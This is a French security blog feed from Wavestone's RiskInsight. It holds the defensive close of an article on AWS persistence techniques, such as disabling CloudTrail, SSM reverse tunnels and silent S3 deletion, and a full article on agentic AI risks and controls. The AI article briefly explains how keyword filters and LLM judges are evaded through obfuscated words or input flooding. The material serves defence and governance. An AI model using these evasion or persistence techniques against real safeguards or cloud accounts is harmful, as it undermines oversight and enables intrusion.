<p style="text-align: justify;">Une solution de Cloud Security Posture Management (CSPM) joue un rôle clé dans la prévention de ces abus. En surveillant en continu les configurations IAM, en détectant les politiques trop permissives et en identifiant les écarts par rapport aux référentiels de conformité, un CSPM peut mettre rapidement en évidence des changements suspects. Par exemple, il peut signaler la création de nouvelles clés d’accès pour des utilisateurs qui utilisent habituellement le SSO, ou détecter l’établissement de relations de confiance avec des comptes externes. Ces capacités aident à empêcher qu’une persistance basée sur IAM ne s’installe durablement.</p>
<p style="text-align: justify;"> </p>
<h3 style="text-align: justify;">EDR</h3>
<p style="text-align: justify;">Au-delà d’IAM, les attaquants peuvent exploiter directement les ressources AWS, telles que les fonctions Lambda et les instances EC2, pour maintenir un accès. L’article a détaillé comment des Lambda layers compromises, des rôles sur‑privilégiés et des tunnels inversés basés sur SSM peuvent être utilisés pour persister sans modifier directement IAM.</p>
<p style="text-align: justify;">Un Cloud EDR complète un CSPM en se concentrant sur le comportement à l’exécution et le contexte d’exécution. Il peut détecter des exécutions Lambda inhabituelles, des expositions inattendues via API Gateway, ou des instances EC2 initiant des tunnels sortants. En corrélant ces comportements avec le contexte d’identité et les changements récents de configuration, un EDR Cloud peut mettre en lumière des techniques de persistance qui passeraient autrement inaperçues. Cette visibilité comportementale est essentielle pour détecter en temps réel la persistance basée sur les ressources.</p>
<p style="text-align: justify;"> </p>
<h3 style="text-align: justify;">Backup et journalisation</h3>
<p style="text-align: justify;">Enfin, l’article a exploré comment des attaquants peuvent altérer la visibilité et la capacité de récupération en ciblant les mécanismes de journalisation et de sauvegarde. La désactivation de CloudTrail, la modification des sélecteurs d’événements, le déploiement de politiques de cycle de vie pour une suppression silencieuse dans S3 ou le détachement de comptes d’une AWS Organization sont autant de techniques qui réduisent la supervision et permettent un compromis ou une destruction à long terme.</p>
<p style="text-align: justify;">Là encore, un CSPM et un EDR Cloud offrent des défenses complémentaires. Un CSPM peut détecter des erreurs de configuration dans les pipelines de journalisation, des modifications non autorisées de politiques de cycle de vie ou des tentatives de quitter l’organisation. De son côté, un EDR Cloud peut repérer l’absence de télémétrie attendue, des baisses soudaines du volume de journaux ou des appels API destructeurs. Ensemble, ils garantissent que les capacités de visibilité et de récupération restent intactes, même en cas d’attaque active.</p>
<p> </p>
<p> </p>
















<p>Cet article <a href="https://www.riskinsight-wavestone.com/2025/09/awsdoor-persistance-sur-aws/">AWSDoor : Persistance sur AWS</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.riskinsight-wavestone.com/2025/09/awsdoor-persistance-sur-aws/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>IA Agentique : typologie des risques et principales mesures de sécurité</title>
		<link>https://www.riskinsight-wavestone.com/2025/07/ia-agentic-typologie-des-risques-et-principales-mesures-de-securite/</link>
					<comments>https://www.riskinsight-wavestone.com/2025/07/ia-agentic-typologie-des-risques-et-principales-mesures-de-securite/#respond</comments>
		
		<dc:creator><![CDATA[Pierre Aubret]]></dc:creator>
		<pubDate>Mon, 28 Jul 2025 09:01:13 +0000</pubDate>
				<category><![CDATA[Cloud & Next-Gen IT Security]]></category>
		<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[Contrôle d’accès]]></category>
		<category><![CDATA[Digital privacy]]></category>
		<category><![CDATA[Gestion des risques]]></category>
		<category><![CDATA[Gouvernance de l’IA]]></category>
		<category><![CDATA[IA agentique]]></category>
		<category><![CDATA[Risk management]]></category>
		<guid isPermaLink="false">https://www.riskinsight-wavestone.com/?p=26854</guid>

					<description><![CDATA[<p>L’intelligence artificielle (IA) a démontré son efficacité pour augmenter la productivité en entreprise. L’enjeu est désormais de lui donner les moyens d’agir de façon la plus autonome possible. Une tendance émerge alors de cette dynamique. Cette tendance, d’après Gartner, est...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2025/07/ia-agentic-typologie-des-risques-et-principales-mesures-de-securite/">IA Agentique : typologie des risques et principales mesures de sécurité</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p style="text-align: justify;">L’intelligence artificielle (IA) a démontré son efficacité pour augmenter la productivité en entreprise. L’enjeu est désormais de lui donner les moyens d’agir de façon la plus autonome possible. Une tendance émerge alors de cette dynamique. Cette tendance, d’après Gartner, est  la tendance stratégique n°1 pour 2025 : l’IA agentique.</p>
<p style="text-align: justify;">Contrairement à l’IA traditionnelle, qui possède une autonomie limitée, les agents IA sont capables de planifier leurs actions de manière autonome, en s’appuyant sur la compréhension de leur environnement pour atteindre des objectifs définis dans leur périmètre d’actions. Cette montée en puissance est directement liée à l’intégration des LLMs (Large Language Models) dans leurs systèmes, leur permettant de traiter des entrées complexes et de lancer des actions en simulant le raisonnement humain.</p>
<p style="text-align: justify;">L’impact attendu est considérable : d’ici 2028, l’IA agentique pourrait automatiser 15% des décisions récurrentes<a href="#_ftn1" name="_ftnref1">[1]</a> et être intégrée à 33% des applications d’entreprise — contre quasiment aucune aujourd’hui. À l’horizon 2029, l’IA agentique pourrait résoudre de manière autonome jusqu’à 80 % des demandes courantes en service client, réduisant les coûts jusqu’à 30 %.<a href="#_ftn2" name="_ftnref2">[2]</a></p>
<p style="text-align: justify;">En parallèle, la perception des risques évolue. Début 2024, Gartner a interrogé 345 responsables du risque, qui ont identifié deux principales menaces émergentes : les activités malveillantes pilotées par l’IA et la désinformation.<a href="#_ftn3" name="_ftnref3">[3]</a></p>
<p style="text-align: justify;">Cette tension entre le potentiel immense de l’IA agentique et l’élargissement de la surface de risque qu’elle implique soulève une question essentielle :</p>
<p style="text-align: justify;"><em>« Comment les organisations peuvent-elles déployer l&rsquo;IA agentique à grande échelle en toute sécurité, en équilibrant l&rsquo;innovation avec la responsabilité, et l&rsquo;automatisation avec le contrôle ? »</em></p>
<p style="text-align: justify;">Cet article explore cette question, en soulignant les risques clés, les principes de sécurité et les conseils pratiques pour aider les RSSI et les leaders technologiques à naviguer dans la prochaine vague d&rsquo;adoption de l&rsquo;IA.</p>
<p> </p>
<h2><strong>Un agent IA, un système d’IA autonome dans la prise de décision</strong></h2>
<p> </p>
<p style="text-align: justify;">Au sein des systèmes d&rsquo;IA, les agents sont conçus pour traiter les stimuli externes et y répondre par des actions spécifiques. Les capacités de ces agents peuvent varier de manière significative, en particulier selon qu&rsquo;ils sont ou non alimentés par des LLM.</p>
<p style="text-align: justify;">Les agents traditionnels suivent généralement un flux de travail basé sur des règles préprogrammées : ils reçoivent des données, les classifient et exécutent une action prédéfinie.</p>
<p style="text-align: justify;"><img loading="lazy" decoding="async" class="aligncenter wp-image-26866 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/07/Diapositive1-1-e1753455946878.jpg" alt="" width="828" height="412" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/07/Diapositive1-1-e1753455946878.jpg 828w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/07/Diapositive1-1-e1753455946878-384x191.jpg 384w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/07/Diapositive1-1-e1753455946878-71x35.jpg 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/07/Diapositive1-1-e1753455946878-768x382.jpg 768w" sizes="auto, (max-width: 828px) 100vw, 828px" /></p>
<p style="text-align: center;"><em>Figure 1 : Un diagramme montrant les différentes parties constitutives d&rsquo;un agent doté de LLM, montrant 1) les stimuli externes, 2) les processus de base des agents (raisonnement et outils) et 3) les actions de l&rsquo;agent.</em></p>
<p style="text-align: justify;">Les agents IA introduisent une nouvelle dimension en incorporant un (ou plusieurs) LLM pour effectuer le raisonnement et la prise de décision entre la perception et l&rsquo;action. Cela rend les réponses plus flexibles et adaptées au contexte et, dans de nombreux cas, permet aux agents IA de se comporter davantage comme des intermédiaires humains.à</p>
<p style="text-align: justify;">Comme illustré dans la figure 1, un agent IA traite les informations en plusieurs étapes :</p>
<ol>
<li><strong>Perception </strong>: L&rsquo;agent IA reçoit des stimuli externes, tels que du texte, des images ou des sons.</li>
<li><strong>Raisonnement </strong>: Ces entrées sont traitées par une couche d&rsquo;orchestration, qui les transforme en formats structurés à l&rsquo;aide de règles de classification et de techniques d&rsquo;apprentissage automatique. Le LLM joue ici un rôle central. Il ajoute une couche de réflexion adaptative qui permet à l&rsquo;agent d&rsquo;analyser le contexte, de sélectionner des outils, d&rsquo;interroger des sources de données externes et de planifier des actions en plusieurs étapes.</li>
<li><strong>Action </strong>: Avec des données affinées et une couche de raisonnement appliquée, l&rsquo;agent exécute des tâches complexes, souvent avec une plus grande autonomie que les systèmes traditionnels.</li>
</ol>
<p style="text-align: justify;">Cette architecture donne aux agents IA la capacité d&rsquo;opérer dans des environnements dynamiques. Ils peuvent ainsi s&rsquo;adapter en temps réel et collaborer avec d&rsquo;autres agents ou systèmes, ce qui constitue un élément clé de différenciation par rapport à l&rsquo;automatisation antérieure, plus statique.</p>
<p style="text-align: justify;">En résumé, les agents IA dotés d’un LLM peuvent réaliser des actions plus complexes en appliquant une forme de raisonnement similaire à de l’intelligence humaine &#8211; un « raisonnement d&rsquo;IA ». Les inputs sont transformés puis affinés, ce qui les rend plus puissants et plus polyvalents que des agents traditionnels qui profitent du RPA (<em>Robotic Process Automation</em>).</p>
<p> </p>
<h2><strong>Retour d’expérience terrain sur l’usage des agents IA chez nos clients </strong></h2>
<p> </p>
<p style="text-align: justify;">Les entreprises ont reconnu à juste titre le potentiel de ces agents IA dans une variété de cas d’usage, allant du plus simple au plus complexe. Plongeons-nous dans le détail des cas d’usage les plus courants, en les différenciant par leur niveau d’autonomie.</p>
<p style="text-align: justify;"><strong>Cas d’usage standard : </strong>Chatbot / agents virtuels</p>
<p style="text-align: justify;">Les agents IA peuvent être configurés pour fournir des réponses instantanées à des questions complexes et ne répondre qu&rsquo;à partir de certains référentiels d&rsquo;information. Cela leur permet de guider les utilisateurs de manière fluide et efficace à travers des bibliothèques SharePoint (ou autres référentiels de documents). Agissant à la fois comme une fonction de recherche et comme un assistant, ces agents peuvent améliorer considérablement la productivité des employés en réduisant le temps passé à rechercher des informations et en garantissant aux utilisateurs un accès rapide aux données dont ils ont besoin. Par exemple, un chatbot intégré à SharePoint peut aider les employés à localiser des documents spécifiques, à comprendre les politiques de l&rsquo;entreprise ou même à contribuer aux processus d&rsquo;intégration en fournissant des informations et des ressources pertinentes. Ces agents ont peu d’autonomie et ne font que répondre directement aux demandes formulées par les utilisateurs.</p>
<p style="text-align: justify;"><strong>Cas d’usage intermédiaires : </strong>Automatisation des tâches récurrentes</p>
<p style="text-align: justify;">Les agents peuvent être utilisés pour rationaliser les tâches répétitives telles que la gestion des plannings, le traitement des demandes des clients et des transactions. Ces agents peuvent être conçus pour suivre des processus spécifiques, offrant des avantages significatifs par rapport aux humains en limitant les erreurs et en augmentant la productivité. Par exemple, un agent IA peut :</p>
<ul>
<li>Planifier des réunions en comparant les calendriers des participants,</li>
<li>Envoyer des rappels</li>
<li>Traiter les demandes courantes de service à la clientèle telles que le suivi des commandes ou la mise à jour des comptes</li>
</ul>
<p style="text-align: justify;">Cette automatisation permet d’une part de gagner du temps, et d’autre part de garantir la cohérence et la précision des tâches. En outre, en s&rsquo;occupant des tâches récurrentes, les agents IA permettent aux employés de se concentrer sur des activités plus complexes et stratégiques, contribuant ainsi à accroître l&rsquo;efficacité et la productivité au sein de l&rsquo;organisation.</p>
<p style="text-align: justify;"><strong>Cas d’usage avancés : </strong>Analyse de données complexes et gestion des vulnérabilités</p>
<p style="text-align: justify;">Les agents peuvent également être utilisés pour des cas d’usage plus complexes, notamment pour la cybersécurité. Par exemple, Microsoft a récemment annoncé le lancement d&rsquo;agents IA avec Security Copilot, un produit portant sur la qualification des incidents de cybersécurité.</p>
<p style="text-align: justify;">Un cas d’usage particulièrement intéressant concerne les agents spécialisés dans la remédiation des vulnérabilités. Ces agents, au sein de Microsoft Intune, viendront :</p>
<ul>
<li>Surveiller les vulnérabilités des endpoints,</li>
<li>Evaluer ces vulnérabilités en termes de risques et d&rsquo;impacts potentiels,</li>
<li>Produire une liste de mesures de mitigation classées par ordre de priorité.</li>
</ul>
<p style="text-align: justify;">Les équipes de sécurité peuvent ainsi se concentrer sur les problèmes les plus critiques, augmentant ainsi leur productivité. En automatisant l&rsquo;identification et la hiérarchisation des vulnérabilités, ces agents permettent aux équipes de sécurité de s&rsquo;attaquer rapidement aux menaces les plus pressantes, réduisant ainsi le risque de failles de sécurité et améliorant la posture de sécurité globale.</p>
<p style="text-align: justify;">La promesse de rentabilité et d&rsquo;automatisation intelligente est convaincante, mais elle introduit également un compromis stratégique. Les RSSI seront confrontés au défi de sécuriser des systèmes de plus en plus autonomes. En effet, en l&rsquo;absence de garde-fous robustes, les organisations s&rsquo;exposent à des perturbations opérationnelles, à des difficultés de gouvernance et à des atteintes à leur réputation. Il faudra également porter une vigilance accrue à la traçabilité des actions des agents, à la visibilité des assets et à la sécurité du Cloud.</p>
<p style="text-align: justify;">Les avantages sont évidents, mais les risques aussi. Sans une approche axée sur la sécurité, l&rsquo;IA agentique pourrait rapidement représenter un casse-tête handicapant plutôt qu&rsquo;un atout.</p>
<p> </p>
<h2><strong>Des risques majoritairement connus mais dont la vraisemblance et l’impact augmentent</strong></h2>
<p> </p>
<p style="text-align: justify;">Pour un système d’IA traditionnel, les surfaces de menace sont généralement limitées aux entrées, au comportement du modèle et aux sorties et à l&rsquo;infrastructure. L&rsquo;IA agentique introduit un nouveau niveau de complexité en matière de sécurité : ils interagissent de manière dynamique et autonome avec leur environnement. Cela couvre les échanges d’agent à agent, d’agent à humain et d’humains à agents. Ces flux peuvent être difficiles à tracer, à surveiller ou à contrôler en temps réel. Par conséquent, le périmètre de sécurité s&rsquo;étend au-delà des modèles statiques pour englober les comportements et les interactions imprévisibles.</p>
<p style="text-align: justify;">Les travaux récents de l&rsquo;OWASP sur la sécurité des agents <a href="#_ftn4" name="_ftnref4">[4]</a> mettent en valeur l&rsquo;ampleur des menaces auxquelles sont confrontés les agents IA aujourd&rsquo;hui. Ces risques se divisent en 3 catégories :</p>
<ul>
<li>Certains sont des <strong>risques traditionnels de cybersécurité </strong>(par exemple : la fuite de données et les attaques sur la supply chain),</li>
<li>D&rsquo;autres sont des <strong>risques généraux liés à l’IA Générative </strong>(par exemple : hallucinations, empoisonnement du modèle),</li>
<li>Une troisième catégorie émergente concerne spécifiquement l&rsquo;<strong>autonomie des agents à réaliser des actions dans le monde réel.</strong></li>
</ul>
<p style="text-align: justify;">Outre les risques traditionnels, les systèmes d&rsquo;IA agentique présentent de nouvelles menaces pour la sécurité, telles que l&rsquo;exécution non autorisée ou involontaire de codes, ou encore le « détournement d&rsquo;agent », où les agents sont manipulés à des fins malveillantes. Ces risques sont amplifiés par la manière dont de nombreux agents IA sont développés aujourd&rsquo;hui.</p>
<p style="text-align: justify;">Environ 90 % des cas d’usage actuels d&rsquo;agents IA reposent sur des plateformes low-code, appréciées pour leur rapidité et leur flexibilité. Cependant, ces plateformes dépendent souvent de bibliothèques et de composants tiers, ce qui introduit d&rsquo;importantes vulnérabilités dans la chaîne d&rsquo;approvisionnement et élargit encore la surface d&rsquo;attaque globale.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-26868 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/07/Diapositive2-3-e1753691957745.jpg" alt="" width="858" height="448" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/07/Diapositive2-3-e1753691957745.jpg 858w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/07/Diapositive2-3-e1753691957745-366x191.jpg 366w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/07/Diapositive2-3-e1753691957745-71x37.jpg 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/07/Diapositive2-3-e1753691957745-768x401.jpg 768w" sizes="auto, (max-width: 858px) 100vw, 858px" /></p>
<p style="text-align: justify;">L&rsquo;IA agentique marque la transition de la simple prédiction passive vers une intelligence proactive, à travers une automatisation plus sophistiquée. À mesure que les organisations mettent en place des réseaux d&rsquo;agents interactifs, les systèmes deviennent de plus en plus complexes et vulnérables (multiplication des fenêtres de risques). Avec l&rsquo;augmentation des interfaces et des échanges autonomes, il est crucial de poser des bases de sécurité solides dès le début. Une première étape essentielle consiste à cartographier les activités des agents pour garantir la transparence, faciliter les audits et permettre des contrôles efficaces.</p>
<p> </p>
<h2><strong>Se prémunir des risques : les bonnes pratiques de sécurité à adopter dès maintenant</strong></h2>
<p> </p>
<p style="text-align: justify;">Pour faire face à l&rsquo;évolution des menaces et des risques posés par l&rsquo;IA agentique, les entreprises doivent adopter des mesures de sécurité proactives afin de garantir des opérations sécurisées et traçables.</p>
<ol>
<li><strong>Cartographie des activités et audits de sécurité</strong></li>
</ol>
<p>Avec l&rsquo;essor des agents IA autonomes et leur interaction croissante avec divers systèmes, il devient impératif de cartographier toutes leurs activités, processus, connexions et flux de données. Cette visibilité est essentielle pour détecter les anomalies et garantir le respect des politiques de sécurité.</p>
<p>Des audits réguliers sont cruciaux pour identifier les vulnérabilités, assurer la conformité et prévenir le phénomène de « shadow AI », où des agents opèrent sans surveillance. Les agents non autorisés peuvent exposer les systèmes à des risques significatifs, et le shadow AI, en particulier les modèles non sanctionnés, représente une menace sérieuse pour la sécurité des données. Auditer les processus décisionnels, l&rsquo;accès aux données et les interactions des agents, tout en maintenant une piste d&rsquo;audit immuable, renforce la responsabilité et la traçabilité globales.</p>
<p>Pour atténuer ces risques, les entreprises doivent adopter des politiques de gouvernance claires, sensibiliser &amp; former ses utilisateurs, et mettre en place des stratégies de détection efficaces. Ces pratiques doivent être soutenues par des frameworks de sécurité spécialisés sur l&rsquo;IA, et par des politiques de gouvernance de la donnée.</p>
<p>Cependant, les audits et la gouvernance ne suffisent pas. Des contrôles d&rsquo;accès robustes pour les agents IA sont nécessaires pour limiter leurs actions et protéger l&rsquo;intégrité du système.<span style="color: #ffffff;"><strong>l&rsquo;IA</strong></span></p>
<p><strong>     2. Filtrage de l&rsquo;IA</strong></p>
<p style="text-align: justify;">Pour éviter que l&rsquo;agent n&rsquo;effectue des actions inappropriées, il faut d’abord s&rsquo;assurer que son système de prise de décision est protégé. L’une des mesures les plus efficaces est de filtrer les inputs et outputs potentiellement malveillants du <em>decision-maker</em>, souvent composé d&rsquo;un orchestrateur et d&rsquo;un LLM.</p>
<p style="text-align: justify;">Il existe plusieurs moyens techniques de filtrer les inputs &amp; outputs d’un LLM :</p>
<p><strong>Filtrage par mot-clé &#8211; Efficacité faible à moyenne : </strong>Empêcher le LLM de prendre en compte toute entrée contenant des mots-clés spécifiés et de générer tout contenu contenant ces mots-clés.</p>
<ul>
<li><strong>Avantage : </strong>Quick-win, en particulier sur les outputs, par exemple en empêchant un chatbot de générer des mots grossiers.</li>
<li><strong>Inconvénient : </strong>Facilement contournable via des entrées déguisées ou en exigeant des sorties déguisées. Par exemple, « p@ssword » ou « p,a,s,s,w,o,r,d » peuvent être des moyens de contourner le mot-clé « password ».</li>
</ul>
<p><strong>LLM-as-a-judge &#8211; Efficacité haute : </strong>Demander au LLM d&rsquo;analyser les inputs et les outputs et d&rsquo;identifier s’ils sont malveillants.</p>
<ul>
<li><strong>Avantage : </strong>Étend l&rsquo;analyse à l&rsquo;ensemble de la réponse.</li>
<li><strong>Inconvénient : </strong>Peut être contourné en noyant l’agent d’informations en input, de telle sorte qu&rsquo;il a du mal à traiter l&rsquo;ensemble des entrées.</li>
</ul>
<p><strong>Classification de l&rsquo;information &#8211; Efficacité très élevée : </strong>Définir des catégories de sujets auxquels le LLM a le droit de répondre ou non. Cela peut se faire par le biais d&rsquo;une whitelist (le LLM ne peut répondre qu&rsquo;à certaines catégories de sujets) et d&rsquo;une blacklist (le LLM n’est pas autorisé à répondre à certaines catégories précises de sujets). Pour cela, on peut utiliser une IA spécialisée pour analyser chaque entrée et chaque sortie.</p>
<ul>
<li><strong>Avantage : </strong>Garantit l&rsquo;alignement de l&rsquo;agent en ne l’empêchant de recevoir des inputs sur des sujets auxquels il ne devrait pas être en mesure de répondre.</li>
<li><strong>Inconvénient : </strong>coût élevé, car cela nécessite une analyse LLM supplémentaire.</li>
</ul>
<p><strong style="font-size: revert; text-align: justify; color: initial;">Pour tous les systèmes d’IA générative, ces actions de filtrage doivent être effectuées pour les inputs/output des utilisateurs. Dans le cas spécifique de l’IA agentique, tous les inputs/output doivent être filtrés, y compris les interactions avec les outils que les systèmes d’IA peuvent utilisés, les bases de données qu’ils peuvent interrogées etc. </strong></p>
<ul>
<li><strong>Mesures de sécurité spécifiques à l&rsquo;IA </strong></li>
</ul>
<p style="text-align: justify;">Inclure un « Human-in-the-loop » (HITL) est essentiel pour garantir le fonctionnement responsable et sécurisé de l&rsquo;IA agentique. Bien que les agents IA puissent exécuter des tâches de manière autonome, le contrôle d’un humain dans les situations à haut risque ou sensibles sur le plan éthique fournit une couche supplémentaire bienvenue de jugement et de responsabilité. Cette surveillance permet d&rsquo;éviter les erreurs, les biais et les conséquences involontaires, tout en permettant aux organisations d&rsquo;intervenir lorsque les actions de l&rsquo;IA s&rsquo;écartent des lignes directrices ou des normes éthiques. Le HITL favorise également la confiance dans les systèmes d&rsquo;IA et garantit l&rsquo;alignement sur les objectifs de l&rsquo;entreprise et les exigences réglementaires. Pour maximiser les avantages de l&rsquo;automatisation, il est essentiel d&rsquo;adopter une approche hybride où IA et humains partagent les responsabilités, approche soutenue par une formation continue pour aborder la conformité et les risques inhérents.</p>
<p style="text-align: justify;">Certaines actions peuvent être strictement interdites à l&rsquo;agent, d&rsquo;autres devraient nécessiter une validation humaine, et d&rsquo;autres encore pourraient être effectuées sans supervision humaine. Ces actions doivent être déterminées par une analyse de risque classique, sur la base de l&rsquo;impact et de l&rsquo;autonomie de l&rsquo;agent. En clair, on évalue l’impact de l’agent en fonction de son autonomie (et non de la probabilité du risque)</p>
<p style="text-align: justify;">Des déclencheurs doivent être mis en place pour déterminer si et quand une validation humaine est nécessaire. On le configure directement dans le Master Prompt du LLM, et l&rsquo;accès peut être restreint en utilisant un modèle IAM approprié.</p>
<p><strong>     3. Contrôles d&rsquo;accès et IAM</strong></p>
<p style="text-align: justify;">Les agents IA jouent un rôle plus actif dans les workflows des entreprises. Ils doivent donc être gérés comme des identités non humaines (NHI), avec leur propre cycle de vie d&rsquo;identité, leurs autorisations d&rsquo;accès et leurs politiques de gouvernance. Il faut donc intégrer les agents dans les frameworks IAM existants, en appliquant la même rigueur que pour les utilisateurs humains.</p>
<p style="text-align: justify;">La gestion des agents IA introduit de nouvelles exigences. Lorsqu&rsquo;ils agissent au nom des utilisateurs finaux, les agents doivent être strictement limités aux permissions de ces utilisateurs, sans dépasser ou conserver des privilèges élevés. Pour y parvenir, les organisations doivent appliquer des principes clés de gestion des accès et des identités (IAM), à savoir :</p>
<ul>
<li>Accès suivant le principe du moindre privilège : Limiter les agents à l&rsquo;ensemble minimum de permissions nécessaires pour accomplir des tâches spécifiques.</li>
<li>Accès <em>Just-in-time</em> (JIT) : Fournir un accès temporaire et contextuel afin de réduire les privilèges permanents et l&rsquo;exposition.</li>
<li>Séparation des tâches et habilitations limitées : Définir des limites claires entre les rôles et empêcher les escalades de privilèges non autorisées.</li>
</ul>
<p style="text-align: justify;">Pour renforcer davantage les contrôles, les équipes de sécurité devraient mettre en place une détection des anomalies en temps réel afin de surveiller le comportement des agents, signaler les violations de politiques et remédier ou escalader automatiquement les problèmes lorsque nécessaire. L&rsquo;accès aux données sensibles doit également être strictement limité. Les violations doivent entraîner une révocation immédiate des privilèges, et des listes de blocage doivent être utilisées pour empêcher les modèles ou points d&rsquo;accès malveillants connus.</p>
<p style="text-align: justify;">En fin de compte, bien que les contrôles techniques soient essentiels, ils doivent être soutenus par une supervision humaine et des mécanismes de gouvernance, en particulier lorsque les agents opèrent dans des contextes à fort impact ou sensibles. La gestion des identités et des accès pour les agents IA doit évoluer en parallèle avec l&rsquo;autonomie croissante de ces systèmes et leur intégration dans des fonctions critiques de l&rsquo;entreprise.</p>
<p style="text-align: justify;"><strong>     4. Gestion des crises IA et Redteam</strong></p>
<p style="text-align: justify;">Bien que les contrôles spécifiques à l&rsquo;IA soient essentiels, les mesures traditionnelles comme la gestion de crise doivent également s&rsquo;étendre au domaine de l&rsquo;IA. À mesure que les cyberattaques deviennent plus sophistiquées, les entreprises devraient envisager des stratégies de gestion de crise en cas de défaillance ou de compromission de l&rsquo;IA. Il est crucial de s&rsquo;assurer que toutes les équipes, des équipes de recherche IA aux équipes de sécurité, soient prêtes à réagir rapidement et efficacement afin de minimiser les perturbations.</p>
<p><strong>Exemple de plan d’action pour les RSSI</strong></p>
<p style="text-align: justify;">Cette année, les RSSI seront exposés à des menaces accrues introduites par l&rsquo;IA agentique, ainsi qu&rsquo;à une pression réglementaire supplémentaire par des réglementations complexes telles que DORA, NIS 2 et l’AI Act. Les RSSI et les directeurs techniques devront collaborer étroitement : les RSSI devront superviser le déploiement sécurisé des systèmes d&rsquo;IA pour s&rsquo;assurer que les interactions avec les agents sont soigneusement cartographiées et sécurisées afin de préserver la sécurité de leurs organisations, de leur personnel et de leurs clients.</p>
<p style="text-align: justify;"><strong>Premières pistes d’actions sécurité pour les RSSI :</strong></p>
<ul>
<li>Limiter l&rsquo;accès des agents IA en appliquant des contrôles d&rsquo;accès stricts et en s&rsquo;alignant sur les politiques IAM existantes.</li>
<li>Surveiller le comportement des agents en suivant leur activité et en menant des audits réguliers pour identifier les vulnérabilités.</li>
<li>Filtrer les inputs et les outputs de l&rsquo;agent pour s&rsquo;assurer que le decision-maker ne lance pas d&rsquo;action involontaire.</li>
<li>S’assurer de la supervision d’un human-in-the-loop cohérente, afin de valider les résultats de l&rsquo;IA pour les décisions/tâches critiques.</li>
<li>Fournir une formation de sensibilisation à l&rsquo;IA agentique pour éduquer les utilisateurs sur les risques, les meilleures pratiques de sécurité et l&rsquo;identification des attaques potentielles.</li>
<li>Auditer l’agent, via du redteaming, afin d&rsquo;identifier les faiblesses potentielles.</li>
<li>Etablir un RACI en cas de mauvais fonctionnement de l’agent : malgré toutes les mesures de sécurité, l&rsquo;IA fonctionne selon des principes probabilistes plutôt que déterministes. Cela signifie que l&rsquo;agent peut occasionnellement se comporter de manière inappropriée.</li>
<li>Préparez-vous aux crises liées à l&rsquo;IA en entamant des discussions avec les équipes concernées afin de garantir une réponse coordonnée en cas d&rsquo;incident.</li>
</ul>
<p style="text-align: justify;">Au cours des dernières années, chez Wavestone, nous avons observé une augmentation significative de la maturité des clients en matière de sécurité de l&rsquo;IA. De nombreuses organisations ont déjà mis en place des processus robustes pour évaluer la sensibilité des initiatives d&rsquo;IA et gérer les risques associés. Ces premiers efforts se sont avérés payants : nous avons observé une réduction de l&rsquo;exposition aux menaces et un renforcement de la gouvernance des systèmes d’IA.</p>
<p style="text-align: justify;">Bien que l&rsquo;IA agentique ne réécrive pas fondamentalement le manuel de sécurité de l&rsquo;IA, elle introduit un changement significatif dans le paysage des risques. Sa nature intrinsèquement autonome et interconnectée augmente à la fois l&rsquo;impact et la probabilité de certaines menaces. La complexité de ces systèmes peut être difficile à gérer au début, mais elle est maîtrisable. Avec une compréhension claire de ces dynamiques et l&rsquo;émergence de nouvelles normes de marché et de protocoles de sécurité, l&rsquo;IA agentique peut s’accomplir pleinement, dans des conditions sécurisées, et assurer un gain de productivité conséquent.</p>
<p style="text-align: justify;">Dans cette mer de menaces en perpétuel changement, notre cap reste clair : accompagner les RSSI et leurs équipiers pour qu’ils avancent avec sérénité.</p>
<p style="text-align: center;"> </p>
<h2>Références</h2>
<p style="text-align: justify;"><a href="#_ftnref1" name="_ftn1">[1]</a> Orlando, Fla., <em>Gartner Identifies the Top 10 Strategic Technology Trends for 2025, </em>October 21, 2024. <a href="https://www.gartner.com/en/newsroom/press-releases/2024-10-21-gartner-identifies-the-top-10-strategic-technology-trends-for-2025">https://www.gartner.com/en/newsroom/press-releases/2024-10-21-gartner-identifies-the-top-10-strategic-technology-trends-for-2025</a></p>
<p style="text-align: justify;"><a href="#_ftnref2" name="_ftn2">[2]</a> Stamford, Conn., <em>Gartner Predicts Agentic AI Will Autonomously Resolve 80% of Common Customer Service Issues Without Human Intervention by 2029, </em>March 5, 2025. <a href="https://www.gartner.com/en/newsroom/press-releases/2025-03-05-gartner-predicts-agentic-ai-will-autonomously-resolve-80-percent-of-common-customer-service-issues-without-human-intervention-by-20290">https://www.gartner.com/en/newsroom/press-releases/2025-03-05-gartner-predicts-agentic-ai-will-autonomously-resolve-80-percent-of-common-customer-service-issues-without-human-intervention-by-20290</a></p>
<p style="text-align: justify;"><a href="#_ftnref3" name="_ftn3">[3]</a> Stamford, Conn. <em>Gartner Survey Shows AI-Enhanced Malicious Attacks Are a New Top Emerging Risk for Enterprises, May 22, 2024. </em><a href="https://www.gartner.com/en/newsroom/press-releases/2024-05-22-gartner-survey-shows-ai-enhanced-malicious-attacks-are-new0"><em>https://www.gartner.com/en/newsroom/press-releases/2024-05-22-gartner-survey-shows-ai-enhanced-malicious-attacks-are-new0</em></a></p>
<p style="text-align: justify;"><a href="#_ftnref4" name="_ftn4">[4]</a> OWASP, <em>OWASP Top 10 threats and mitigation for AI Agents, </em>2025. <a href="https://github.com/precize/OWASP-Agentic-AI/blob/main/README.md">OWASP-Agentic-AI/README.md at main · precize/OWASP-Agentic-AI · GitHub</a></p>
<p style="text-align: center;"><em>Merci à Leina HATCH pour son aide précieuse dans la rédaction de cet article.</em></p>
